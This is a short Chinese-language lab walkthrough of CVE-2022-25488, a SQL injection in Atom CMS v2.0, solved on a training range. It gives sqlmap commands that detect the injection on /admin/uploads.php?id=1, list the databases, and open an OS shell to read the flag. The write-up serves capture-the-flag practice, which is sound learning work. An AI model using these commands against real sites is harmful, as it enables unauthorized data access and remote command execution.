CVE-2022-25488
导读:简介Atom CMS v2.0存在sql注入漏洞在/admin/ajax/avatar.php页面。 实际上这个靶场漏洞很多,有很多注入点。本人使用春秋云境免费靶场在线搭建。详解直接访问网址,跳转/home路径,而且报错。使用dirsear...
简介
Atom CMS v2.0存在sql注入漏洞在/admin/ajax/avatar.php页面。 实际上这个靶场漏洞很多,有很多注入点。
本人使用春秋云境免费靶场在线搭建。
详解
- 直接访问网址,跳转
/home路径,而且报错。

- 使用
dirsearch工具扫描路径,发现有个/admin/uploads.php路径。访问路径。

- 页面返回
mysql报错信息,而且有个where id=,尝试参数id=1访问。

id传过去了,而且没有mysql报错信息。尝试使用sqlmap注入。- 使用SQLmap注入,
id存在注入点。是报错注入和时间盲注。
sqlmap -u http://eci-2ze318gwrq9fg4u3wft9.cloudeci1.ichunqiu.com/admin/uploads.php?id=1 
- 查看所有数据库,发现没有
flag数据库(一般flag都会存在flag数据库中)。
sqlmap -u http://eci-2ze318gwrq9fg4u3wft9.cloudeci1.ichunqiu.com/admin/uploads.php?id=1 --dbsflag应该是在根目录下flag文件中,使用sqlmap获取shell。成功获取flag。
sqlmap -u http://eci-2ze318gwrq9fg4u3wft9.cloudeci1.ichunqiu.com/admin/uploads.php?id=1 --os-shell
声明:本文内容由网友自发贡献,本站不承担相应法律责任。对本内容有异议或投诉,请联系2913721942#qq.com核实处理,我们将尽快回复您,谢谢合作!
若转载请注明出处: CVE-2022-25488
本文地址: https://pptw.com/jishu/504573.html
